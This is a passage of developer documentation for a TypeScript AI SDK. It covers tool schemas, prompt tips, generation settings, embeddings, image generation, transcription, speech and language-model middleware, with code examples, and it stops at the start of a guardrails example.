      }),
    },
    // For tools with zero arguments, you should use an empty object:
    'tool-with-no-args': {
      parameters: z.object({}),
    },
  },
});

Pros:

Control over which tools are loaded
Full TypeScript type safety
Better IDE support with autocompletion
Catch parameter mismatches during development

Cons:

Need to manually keep schemas in sync with server
More code to maintain

When you define schemas, the client will only pull the explicitly defined tools, even if the server offers additional tools. This can be beneficial for:

Keeping your application focused on the tools it needs
Reducing unnecessary tool loading
Making your tool dependencies explicit

Examples

You can see tools in action using various frameworks in the following examples:

title: Prompt Engineering description: Learn how to develop prompts with AI SDK Core.

Prompt Engineering

Tips

Prompts for Tools

When you create prompts that include tools, getting good results can be tricky as the number and complexity of your tools increases.

Here are a few tips to help you get the best results:

Use a model that is strong at tool calling, such as gpt-4 or gpt-4-turbo. Weaker models will often struggle to call tools effectively and flawlessly.
Keep the number of tools low, e.g. to 5 or less.
Keep the complexity of the tool parameters low. Complex Zod schemas with many nested and optional elements, unions, etc. can be challenging for the model to work with.
Use semantically meaningful names for your tools, parameters, parameter properties, etc. The more information you pass to the model, the better it can understand what you want.
Add .describe("...") to your Zod schema properties to give the model hints about what a particular property is for.
When the output of a tool might be unclear to the model and there are dependencies between tools, use the description field of a tool to provide information about the output of the tool execution.
You can include example input/outputs of tool calls in your prompt to help the model understand how to use the tools. Keep in mind that the tools work with JSON objects, so the examples should use JSON.

In general, the goal should be to give the model all information it needs in a clear way.

Tool & Structured Data Schemas

The mapping from Zod schemas to LLM inputs (typically JSON schema) is not always straightforward, since the mapping is not one-to-one.

Zod Dates

Zod expects JavaScript Date objects, but models return dates as strings. You can specify and validate the date format using z.string().datetime() or z.string().date(), and then use a Zod transformer to convert the string to a Date object.

const result = await generateObject({
  model: openai('gpt-4-turbo'),
  schema: z.object({
    events: z.array(
      z.object({
        event: z.string(),
        date: z
          .string()
          .date()
          .transform(value => new Date(value)),
      }),
    ),
  }),
  prompt: 'List 5 important events from the year 2000.',
});

Debugging

Inspecting Warnings

Not all providers support all AI SDK features. Providers either throw exceptions or return warnings when they do not support a feature. To check if your prompt, tools, and settings are handled correctly by the provider, you can check the call warnings:

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello, world!',
});

console.log(result.warnings);

HTTP Request Bodies

You can inspect the raw HTTP request bodies for models that expose them, e.g. OpenAI. This allows you to inspect the exact payload that is sent to the model provider in the provider-specific way.

Request bodies are available via the request.body property of the response:

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello, world!',
});

console.log(result.request.body);

title: Settings description: Learn how to configure the AI SDK.

Settings

Large language models (LLMs) typically provide settings to augment their output.

All AI SDK functions support the following common settings in addition to the model, the prompt, and additional provider-specific settings:

const result = await generateText({
  model: yourModel,
  maxTokens: 512,
  temperature: 0.3,
  maxRetries: 5,
  prompt: 'Invent a new holiday and describe its traditions.',
});

`maxTokens`

Maximum number of tokens to generate.

`temperature`

Temperature setting.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means almost deterministic results, and higher values mean more randomness.

It is recommended to set either temperature or topP, but not both.

`topP`

Nucleus sampling.

The value is passed through to the provider. The range depends on the provider and model. For most providers, nucleus sampling is a number between 0 and 1. E.g. 0.1 would mean that only tokens with the top 10% probability mass are considered.

It is recommended to set either temperature or topP, but not both.

`topK`

Only sample from the top K options for each subsequent token.

Used to remove "long tail" low probability responses. Recommended for advanced use cases only. You usually only need to use temperature.

`presencePenalty`

The presence penalty affects the likelihood of the model to repeat information that is already in the prompt.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means no penalty.

`frequencyPenalty`

The frequency penalty affects the likelihood of the model to repeatedly use the same words or phrases.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means no penalty.

`stopSequences`

The stop sequences to use for stopping the text generation.

If set, the model will stop generating text when one of the stop sequences is generated. Providers may have limits on the number of stop sequences.

`seed`

It is the seed (integer) to use for random sampling. If set and supported by the model, calls will generate deterministic results.

`maxRetries`

Maximum number of retries. Set to 0 to disable retries. Default: 2.

`abortSignal`

An optional abort signal that can be used to cancel the call.

The abort signal can e.g. be forwarded from a user interface to cancel the call, or to define a timeout.

Example: Timeout

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Invent a new holiday and describe its traditions.',
  abortSignal: AbortSignal.timeout(5000), // 5 seconds
});

`headers`

Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.

You can use the request headers to provide additional information to the provider, depending on what the provider supports. For example, some observability providers support headers such as Prompt-Id.

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Invent a new holiday and describe its traditions.',
  headers: {
    'Prompt-Id': 'my-prompt-id',
  },
});

title: Embeddings description: Learn how to embed values with the AI SDK.

Embeddings

Embedding a Single Value

The AI SDK provides the embed function to embed single values, which is useful for tasks such as finding similar words or phrases or clustering text. You can use it with embeddings models, e.g. openai.embedding('text-embedding-3-large') or mistral.embedding('mistral-embed').

import { embed } from 'ai';
import { openai } from '@ai-sdk/openai';

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: openai.embedding('text-embedding-3-small'),
  value: 'sunny day at the beach',
});

Embedding Many Values

When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).

The AI SDK provides the embedMany function for this purpose. Similar to embed, you can use it with embeddings models, e.g. openai.embedding('text-embedding-3-large') or mistral.embedding('mistral-embed').

import { openai } from '@ai-sdk/openai';
import { embedMany } from 'ai';

// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
  model: openai.embedding('text-embedding-3-small'),
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

Embedding Similarity

After embedding values, you can calculate the similarity between them using the cosineSimilarity function. This is useful to e.g. find similar words or phrases in a dataset. You can also rank and filter related items based on their similarity.

import { openai } from '@ai-sdk/openai';
import { cosineSimilarity, embedMany } from 'ai';

const { embeddings } = await embedMany({
  model: openai.embedding('text-embedding-3-small'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});

console.log(
  `cosine similarity: ${cosineSimilarity(embeddings[0], embeddings[1])}`,
);

Token Usage

Many providers charge based on the number of tokens used to generate embeddings. Both embed and embedMany provide token usage information in the usage property of the result object:

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding, usage } = await embed({
  model: openai.embedding('text-embedding-3-small'),
  value: 'sunny day at the beach',
});

console.log(usage); // { tokens: 10 }

Settings

Retries

Both embed and embedMany accept an optional maxRetries parameter of type number that you can use to set the maximum number of retries for the embedding process. It defaults to 2 retries (3 attempts in total). You can set it to 0 to disable retries.

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: openai.embedding('text-embedding-3-small'),
  value: 'sunny day at the beach',
  maxRetries: 0, // Disable retries
});

Abort Signals and Timeouts

Both embed and embedMany accept an optional abortSignal parameter of type AbortSignal that you can use to abort the embedding process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: openai.embedding('text-embedding-3-small'),
  value: 'sunny day at the beach',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

Both embed and embedMany accept an optional headers parameter of type Record<string, string> that you can use to add custom headers to the embedding request.

import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: openai.embedding('text-embedding-3-small'),
  value: 'sunny day at the beach',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Embedding Providers & Models

Several providers offer embedding models:

Provider	Model	Embedding Dimensions
OpenAI	`text-embedding-3-large`	3072
OpenAI	`text-embedding-3-small`	1536
OpenAI	`text-embedding-ada-002`	1536
Google Generative AI	`text-embedding-004`	768
Mistral	`mistral-embed`	1024
Cohere	`embed-english-v3.0`	1024
Cohere	`embed-multilingual-v3.0`	1024
Cohere	`embed-english-light-v3.0`	384
Cohere	`embed-multilingual-light-v3.0`	384
Cohere	`embed-english-v2.0`	4096
Cohere	`embed-english-light-v2.0`	1024
Cohere	`embed-multilingual-v2.0`	768
Amazon Bedrock	`amazon.titan-embed-text-v1`	1024
Amazon Bedrock	`amazon.titan-embed-text-v2:0`	1024

title: Image Generation description: Learn how to generate images with the AI SDK.

Image Generation

Image generation is an experimental feature.

The AI SDK provides the generateImage function to generate images based on a given prompt using an image model.

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
});

You can access the image data using the base64 or uint8Array properties:

const base64 = image.base64; // base64 image data
const uint8Array = image.uint8Array; // Uint8Array image data

Settings

Size and Aspect Ratio

Depending on the model, you can either specify the size or the aspect ratio.

Size

The size is specified as a string in the format {width}x{height}. Models only support a few sizes, and the supported sizes are different for each model and provider.

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  size: '1024x1024',
});

Aspect Ratio

The aspect ratio is specified as a string in the format {width}:{height}. Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.

import { experimental_generateImage as generateImage } from 'ai';
import { vertex } from '@ai-sdk/google-vertex';

const { image } = await generateImage({
  model: vertex.image('imagen-3.0-generate-002'),
  prompt: 'Santa Claus driving a Cadillac',
  aspectRatio: '16:9',
});

Generating Multiple Images

generateImage also supports generating multiple images at once:

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { images } = await generateImage({
  model: openai.image('dall-e-2'),
  prompt: 'Santa Claus driving a Cadillac',
  n: 4, // number of images to generate
});

Each image model has an internal limit on how many images it can generate in a single API call. The AI SDK manages this automatically by batching requests appropriately when you request multiple images using the n parameter. By default, the SDK uses provider-documented limits (for example, DALL-E 3 can only generate 1 image per call, while DALL-E 2 supports up to 10).

If needed, you can override this behavior using the maxImagesPerCall setting when configuring your model. This is particularly useful when working with new or custom models where the default batch size might not be optimal:

const model = openai.image('dall-e-2', {
  maxImagesPerCall: 5, // Override the default batch size
});

const { images } = await generateImage({
  model,
  prompt: 'Santa Claus driving a Cadillac',
  n: 10, // Will make 2 calls of 5 images each
});

Providing a Seed

You can provide a seed to the generateImage function to control the output of the image generation process. If supported by the model, the same seed will always produce the same image.

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  seed: 1234567890,
});

Provider-specific Settings

Image models often have provider- or even model-specific settings. You can pass such settings to the generateImage function using the providerOptions parameter. The options for the provider (openai in the example below) become request body properties.

import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  size: '1024x1024',
  providerOptions: {
    openai: { style: 'vivid', quality: 'hd' },
  },
});

Abort Signals and Timeouts

generateImage accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the image generation process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

generateImage accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the image generation request.

import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  value: 'sunny day at the beach',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.

const { image, warnings } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
});

Error Handling

When generateImage cannot generate a valid image, it throws a AI_NoImageGeneratedError.

This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the image model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling

import { generateImage, NoImageGeneratedError } from 'ai';

try {
  await generateImage({ model, prompt });
} catch (error) {
  if (NoImageGeneratedError.isInstance(error)) {
    console.log('NoImageGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Generating Images with Language Models

Some language models such as Google gemini-2.0-flash-exp support multi-modal outputs including images. With such models, you can access the generated images using the files property of the response.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.0-flash-exp'),
  providerOptions: {
    google: { responseModalities: ['TEXT', 'IMAGE'] },
  },
  prompt: 'Generate an image of a comic cat',
});

for (const file of result.files) {
  if (file.mimeType.startsWith('image/')) {
    // The file object provides multiple data formats:
    // Access images as base64 string, Uint8Array binary data, or check type
    // - file.base64: string (data URL format)
    // - file.uint8Array: Uint8Array (binary data)
    // - file.mimeType: string (e.g. "image/png")
  }
}

Image Models

Provider	Model	Support sizes (`width x height`) or aspect ratios (`width : height`)
xAI Grok	`grok-2-image`	1024x768 (default)
OpenAI	`gpt-image-1`	1024x1024, 1536x1024, 1024x1536
OpenAI	`dall-e-3`	1024x1024, 1792x1024, 1024x1792
OpenAI	`dall-e-2`	256x256, 512x512, 1024x1024
Amazon Bedrock	`amazon.nova-canvas-v1:0`	320-4096 (multiples of 16), 1:4 to 4:1, max 4.2M pixels
Fal	`fal-ai/flux/dev`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/flux-lora`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/fast-sdxl`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/flux-pro/v1.1-ultra`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/ideogram/v2`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/recraft-v3`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/stable-diffusion-3.5-large`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/hyper-sdxl`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
DeepInfra	`stabilityai/sd3.5`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
DeepInfra	`black-forest-labs/FLUX-1.1-pro`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-1-schnell`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-1-dev`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-pro`	256-1440 (multiples of 32)
DeepInfra	`stabilityai/sd3.5-medium`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
DeepInfra	`stabilityai/sdxl-turbo`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
Replicate	`black-forest-labs/flux-schnell`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Replicate	`recraft-ai/recraft-v3`	1024x1024, 1365x1024, 1024x1365, 1536x1024, 1024x1536, 1820x1024, 1024x1820, 1024x2048, 2048x1024, 1434x1024, 1024x1434, 1024x1280, 1280x1024, 1024x1707, 1707x1024
Google Vertex	`imagen-3.0-generate-002`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-3.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Fireworks	`accounts/fireworks/models/flux-1-dev-fp8`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Fireworks	`accounts/fireworks/models/flux-1-schnell-fp8`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Fireworks	`accounts/fireworks/models/playground-v2-5-1024px-aesthetic`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/japanese-stable-diffusion-xl`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/playground-v2-1024px-aesthetic`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/SSD-1B`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/stable-diffusion-xl-1024-v1-0`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Luma	`photon-1`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Luma	`photon-flash-1`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Together.ai	`stabilityai/stable-diffusion-xl-base-1.0`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-dev`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-dev-lora`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-schnell`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-canny`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-depth`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-redux`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1.1-pro`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-pro`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-schnell-Free`	512x512, 768x768, 1024x1024

Above are a small subset of the image models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Transcription description: Learn how to transcribe audio with the AI SDK.

Transcription

Transcription is an experimental feature.

The AI SDK provides the transcribe function to transcribe audio using a transcription model.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
});

The audio property can be a Uint8Array, ArrayBuffer, Buffer, string (base64 encoded audio data), or a URL.

To access the generated transcript:

const text = transcript.text; // transcript text e.g. "Hello, world!"
const segments = transcript.segments; // array of segments with start and end times, if available
const language = transcript.language; // language of the transcript e.g. "en", if available
const durationInSeconds = transcript.durationInSeconds; // duration of the transcript in seconds, if available

Settings

Provider-Specific settings

Transcription models often have provider or model-specific settings which you can set using the providerOptions parameter.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    openai: {
      timestampGranularities: ['word'],
    },
  },
});

Abort Signals and Timeouts

transcribe accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the transcription process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

transcribe accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the transcription request.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

Warnings (e.g. unsupported parameters) are available on the warnings property.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
});

const warnings = transcript.warnings;

Error Handling

When transcribe cannot generate a valid transcript, it throws a AI_NoTranscriptGeneratedError.

This error can arise for any the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the transcription model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

import {
  experimental_transcribe as transcribe,
  NoTranscriptGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

try {
  await transcribe({
    model: openai.transcription('whisper-1'),
    audio: await readFile('audio.mp3'),
  });
} catch (error) {
  if (NoTranscriptGeneratedError.isInstance(error)) {
    console.log('NoTranscriptGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Transcription Models

Provider	Model
OpenAI	`whisper-1`
OpenAI	`gpt-4o-transcribe`
OpenAI	`gpt-4o-mini-transcribe`
ElevenLabs	`scribe_v1`
ElevenLabs	`scribe_v1_experimental`
Groq	`whisper-large-v3-turbo`
Groq	`distil-whisper-large-v3-en`
Groq	`whisper-large-v3`
Azure OpenAI	`whisper-1`
Azure OpenAI	`gpt-4o-transcribe`
Azure OpenAI	`gpt-4o-mini-transcribe`
Rev.ai	`machine`
Rev.ai	`low_cost`
Rev.ai	`fusion`
Deepgram	`base` (+ variants)
Deepgram	`enhanced` (+ variants)
Deepgram	`nova` (+ variants)
Deepgram	`nova-2` (+ variants)
Deepgram	`nova-3` (+ variants)
Gladia	`default`
AssemblyAI	`best`
AssemblyAI	`nano`
Fal	`whisper`
Fal	`wizper`

Above are a small subset of the transcription models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Speech description: Learn how to generate speech from text with the AI SDK.

Speech

Speech is an experimental feature.

The AI SDK provides the generateSpeech function to generate speech from text using a speech model.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  voice: 'alloy',
});

To access the generated audio:

const audio = audio.audioData; // audio data e.g. Uint8Array

Settings

Provider-Specific settings

You can set model-specific settings with the providerOptions parameter.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  providerOptions: {
    openai: {
      // ...
    },
  },
});

Abort Signals and Timeouts

generateSpeech accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the speech generation process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { readFile } from 'fs/promises';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

generateSpeech accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the speech generation request.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { readFile } from 'fs/promises';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

Warnings (e.g. unsupported parameters) are available on the warnings property.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { readFile } from 'fs/promises';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
});

const warnings = audio.warnings;

Error Handling

When generateSpeech cannot generate a valid audio, it throws a AI_NoAudioGeneratedError.

This error can arise for any the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the speech model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

import {
  experimental_generateSpeech as generateSpeech,
  AI_NoAudioGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

try {
  await generateSpeech({
    model: openai.speech('tts-1'),
    text: 'Hello, world!',
  });
} catch (error) {
  if (AI_NoAudioGeneratedError.isInstance(error)) {
    console.log('AI_NoAudioGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Speech Models

Provider	Model
OpenAI	`tts-1`
OpenAI	`tts-1-hd`
OpenAI	`gpt-4o-mini-tts`
LMNT	`aurora`
LMNT	`blizzard`
Hume	`default`

Above are a small subset of the speech models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Language Model Middleware description: Learn how to use middleware to enhance the behavior of language models

Language Model Middleware

Language model middleware is a way to enhance the behavior of language models by intercepting and modifying the calls to the language model.

It can be used to add features like guardrails, RAG, caching, and logging in a language model agnostic way. Such middleware can be developed and distributed independently from the language models that they are applied to.

Using Language Model Middleware

You can use language model middleware with the wrapLanguageModel function. It takes a language model and a language model middleware and returns a new language model that incorporates the middleware.

import { wrapLanguageModel } from 'ai';

const wrappedLanguageModel = wrapLanguageModel({
  model: yourModel,
  middleware: yourLanguageModelMiddleware,
});

The wrapped language model can be used just like any other language model, e.g. in streamText:

const result = streamText({
  model: wrappedLanguageModel,
  prompt: 'What cities are in the United States?',
});

Multiple middlewares

You can provide multiple middlewares to the wrapLanguageModel function. The middlewares will be applied in the order they are provided.

const wrappedLanguageModel = wrapLanguageModel({
  model: yourModel,
  middleware: [firstMiddleware, secondMiddleware],
});

// applied as: firstMiddleware(secondMiddleware(yourModel))

Built-in Middleware

The AI SDK comes with several built-in middlewares that you can use to configure language models:

extractReasoningMiddleware: Extracts reasoning information from the generated text and exposes it as a reasoning property on the result.
simulateStreamingMiddleware: Simulates streaming behavior with responses from non-streaming language models.
defaultSettingsMiddleware: Applies default settings to a language model.

Extract Reasoning

Some providers and models expose reasoning information in the generated text using special tags, e.g. <think> and </think>.

The extractReasoningMiddleware function can be used to extract this reasoning information and expose it as a reasoning property on the result.

import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

The extractReasoningMiddleware function also includes a startWithReasoning option. When set to true, the reasoning tag will be prepended to the generated text. This is useful for models that do not include the reasoning tag at the beginning of the response. For more details, see the DeepSeek R1 guide.

Simulate Streaming

The simulateStreamingMiddleware function can be used to simulate streaming behavior with responses from non-streaming language models. This is useful when you want to maintain a consistent streaming interface even when using models that only provide complete responses.

import { wrapLanguageModel, simulateStreamingMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: simulateStreamingMiddleware(),
});

Default Settings

The defaultSettingsMiddleware function can be used to apply default settings to a language model.

import { wrapLanguageModel, defaultSettingsMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: defaultSettingsMiddleware({
    settings: {
      temperature: 0.5,
      maxTokens: 800,
      // note: use providerMetadata instead of providerOptions here:
      providerMetadata: { openai: { store: false } },
    },
  }),
});

Implementing Language Model Middleware

You can implement any of the following three function to modify the behavior of the language model:

transformParams: Transforms the parameters before they are passed to the language model, for both doGenerate and doStream.
wrapGenerate: Wraps the doGenerate method of the language model. You can modify the parameters, call the language model, and modify the result.
wrapStream: Wraps the doStream method of the language model. You can modify the parameters, call the language model, and modify the result.

Here are some examples of how to implement language model middleware:

Examples

Logging

This example shows how to log the parameters and generated text of a language model call.

import type { LanguageModelV1Middleware, LanguageModelV1StreamPart } from 'ai';

export const yourLogMiddleware: LanguageModelV1Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    console.log('doGenerate called');
    console.log(`params: ${JSON.stringify(params, null, 2)}`);

    const result = await doGenerate();

    console.log('doGenerate finished');
    console.log(`generated text: ${result.text}`);

    return result;
  },

  wrapStream: async ({ doStream, params }) => {
    console.log('doStream called');
    console.log(`params: ${JSON.stringify(params, null, 2)}`);

    const { stream, ...rest } = await doStream();

    let generatedText = '';

    const transformStream = new TransformStream<
      LanguageModelV1StreamPart,
      LanguageModelV1StreamPart
    >({
      transform(chunk, controller) {
        if (chunk.type === 'text-delta') {
          generatedText += chunk.textDelta;
        }

        controller.enqueue(chunk);
      },

      flush() {
        console.log('doStream finished');
        console.log(`generated text: ${generatedText}`);
      },
    });

    return {
      stream: stream.pipeThrough(transformStream),
      ...rest,
    };
  },
};

Caching

This example shows how to build a simple cache for the generated text of a language model call.

import type { LanguageModelV1Middleware } from 'ai';

const cache = new Map<string, any>();

export const yourCacheMiddleware: LanguageModelV1Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    const cacheKey = JSON.stringify(params);

    if (cache.has(cacheKey)) {
      return cache.get(cacheKey);
    }

    const result = await doGenerate();

    cache.set(cacheKey, result);

    return result;
  },

  // here you would implement the caching logic for streaming
};

Retrieval Augmented Generation (RAG)

This example shows how to use RAG as middleware.

import type { LanguageModelV1Middleware } from 'ai';

export const yourRagMiddleware: LanguageModelV1Middleware = {
  transformParams: async ({ params }) => {
    const lastUserMessageText = getLastUserMessageText({
      prompt: params.prompt,
    });

    if (lastUserMessageText == null) {
      return params; // do not use RAG (send unmodified parameters)
    }

    const instruction =
      'Use the following information to answer the question:\n' +
      findSources({ text: lastUserMessageText })
        .map(chunk => JSON.stringify(chunk))
        .join('\n');

    return addToLastUserMessage({ params, text: instruction });
  },
};

Guardrails

Guard rails are a way to ensure that the generated text of a language model call is safe and appropriate. This example shows how to use guardrails as middleware.

import type { LanguageModelV1Middleware } from 'ai';

export const yourGuardrailMiddleware: LanguageModelV1Middleware = {
